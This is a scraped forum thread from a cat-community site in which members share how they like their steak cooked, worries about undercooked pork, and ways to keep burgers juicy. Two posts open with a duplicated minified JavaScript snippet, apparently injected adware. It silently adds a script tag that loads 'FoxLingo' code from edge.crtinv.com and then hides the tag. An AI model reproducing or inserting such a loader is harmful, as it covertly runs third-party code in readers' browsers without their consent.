Votes: 10 24.4%
  • Well Done

Votes: 10 24.4%

• Total voters

sk_pacer

TCS Member
Top Cat
Purraise
I can't vote because it depends on the steak - I will eat it anywhere from raw (tartare sans onions) to well done. For most steaks (T-bone, etc) rare to medium is good, but for other steaks like round or shoulder, they DO require braising so well done it is. Roast is best for me at medium well,

I still cannot bring myself to eat pink pork nor can I eat rare duck or goose (bot are considered red meats) - all has to be well done and I don't give a rodent's behind what Ramsey says. Lamb is gross and best left at the meat counter

just mike

TCS Member
Top Cat
Purraise
A lot of times it depends upon the cut of meat.  But mostly, medium rare to medium is just fine by me

rad65

TCS Member
Top Cat
Purraise
I still cannot bring myself to eat pink pork nor can I eat rare duck or goose (bot are considered red meats) 
I definitely agree with this. I know there aren't a ton of cases of tapeworms in the US, but 10th grade biology has stuck with me too much. I make sure all the pork I cook is well done.

Winchester

In the kitchen with my cookies
Veteran
Purraise
The way I see it, if you're going to burn the steak until it's dead again, then you might as well be eating the cheapest, worst cut of the cow, or grilling up some opossum. It's all the same at that point.
I completely agree with you. I never did any kind of beef when my parents came to dinner. My dad always wanted it so done that it was shoe leather and it's such a waste of good beef. When Mom and Dad had dinner at our place, I usually did some kind of chicken dish or sometimes a pork roast, but I refused to cook beef for them. Dad even asked me one time why we never had beef and I told him that I refused to ruin beef. He shook his head, but it was the truth.

As for pork chops, steaks, etc, I grill it to between 155 and 160 degrees (then tent it for about 10 minutes or so) and it's fine for us. Same for roasts and tenderloins.

Last edited:
  • Thread Starter Thread Starter

natalie_ca

TCS Member
Top Cat
Purraise
My dad always wanted it so done that it was shoe leather
A friend of mine and I go out to dinner once or twice a month.  She's like your dad and has her red meet cooked very, very, very well done.  And then she complains about how dry and tough her steak is, while mine looks so soft and juicy!  I kept telling her that it was because she has her steak overly cooked, and the more you cook it, the tougher and drier it gets.

The last time we went to a great steak house, I convinced her to order her steak medium well. She enjoyed it much better!  My steak was medium rare, and after telling her that she eats raw fish, so I couldn't understand why she wouldn't eat slightly undercooked beef, she agreed to try a bite of my steak because it was pretty dark in the restaurant and she couldn't see the colour of the meat.  She ended up having 4 bites of my steak.

The next time we go I'll try and get her to order medium. I think she will go for it now that she realizes that the reason she hasn't enjoyed steak is because she practically has it dehydrated!  lol

sk_pacer

TCS Member
Top Cat
Purraise
I definitely agree with this. I know there aren't a ton of cases of tapeworms in the US, but 10th grade biology has stuck with me too much. I make sure all the pork I cook is well done.
We were told it was trichinosis, not tapeworms..........and I still remember reading the effects that included painful muscle cysts in anything that ate undercooked pork

nurseangel

TCS Member
Veteran
Purraise
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();Me either!  For some reason making hamburgers eludes me.  They always come out dry and like hockey pucks. I always use regular or lean ground beef. And I either fry them or use my indoor electric grill. But they never turn out juicy and soft.
You could try topping in raw bacon slices or even adding a little finely chopped raw bacon to the hamburger mix and then prepare as you normally would.  This is what the they do at work when they make deer burgers, since venison is so lean.  I don't eat it, but from what I understand the bacon does not hurt the taste. 

When I go to a restaurant, I tell the waiter I want my steak well done and to please tell whoever is cooking it that I don't care if it is burned. 

Last edited:

sk_pacer

TCS Member
Top Cat
Purraise
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();Me either!  For some reason making hamburgers eludes me.  They always come out dry and like hockey pucks. I always use regular or lean ground beef. And I either fry them or use my indoor electric grill. But they never turn out juicy and soft.
Do you add a binder like eggs or milk? That also helps a lot. When I make burgers, I add a bit of bread crumbs and then egg to hold it all together. They come out juicy, If I am lazy and just make a meat patty, they can be dry and even tough

• Thread Starter Thread Starter

natalie_ca

TCS Member
Top Cat
Purraise
Do you add a binder like eggs or milk? That also helps a lot. When I make burgers, I add a bit of bread crumbs and then egg to hold it all together. They come out juicy, If I am lazy and just make a meat patty, they can be dry and even tough
Yes, eggs, uncooked instant oatmeal (instead of bread crumbs), water, onions, white horseradish, spices, salt, pepper

denice

TCS Member
Veteran
Purraise
I used to prefer well, but medium to well is my preference now.

I once heard that the farther you get from the cow, the rarer you like your meat.  I know when I worked on a cattle ranch, well-done was the standard.  One person said it was because you saw too many injured cows, and rare steak looks just like a bad barbed wire cut.

That could be true.  I'm not that much of a meat eater, anyway.

I think this is true.   I grew up on a farm and everyone I knew, myself included, ate meat well done.  I now prefer steak and the high quality roasts medium.  I still cook the cheap roasts like chuck roast a long time with liquid until they are not only well done but falling apart tender.

elvedee

TCS Member
Young Cat
Purraise
Done! medium well all the way, and all the animals love the smell hehe

aeevr

TCS Member
Alpha Cat
Purraise
The secret to a juicy burger is higher fat meat - like 80% lean.

Edit: I see you were told that already.

Last edited:

aeevr

TCS Member
Alpha Cat
Purraise
A lot of high end - like Michelin rated - restaurants don't ask; you get the meat rare or medium rare.

Iron Chef's never cook steaks to order!

I love tartare and carpaccio - raw beef dishes.

blueyedgirl5946

TCS Member
Veteran
Purraise
No doubt about it, well done. Most of the time, hubby cooks it as restaurants always leave it bloody.

margecat

Mentor
Staff Member
Mentor
Purraise
I have not a huge tolerance for eating meat. I want it to not look like a dead animal. So I don't really eat steak as a whole steak. I'll eat something with steak pieces in it, though. And yes, very well done only.

And, yeah, I really should just be vegetarian considering my low meat tolerance. But it's easier not to fuss about whether something has small pieces of meat in it or not.
You and me both!  I always say that I don't want my meat to resemble the animal from whence it came!  I used to be a vegetarian (until my iron count became very abnormal, and my doctor told me I had to start eating red meat again), so any blood on my food turns me off.

binky121912

TCS Member
Adult Cat
Purraise
Medium -rare more to the rare side ad some A-1, plus onion , baked potato, oh my, then go lay down and be the fat-cat, lol

swampwitch

TCS Member
Top Cat
Purraise
I once heard that the farther you get from the cow, the rarer you like your meat.  I know when I worked on a cattle ranch, well-done was the standard.  One person said it was because you saw too many injured cows, and rare steak looks just like a bad barbed wire cut.
 My dad was a rancher - medium well for me - can't handle blood on my plate.  

Last edited: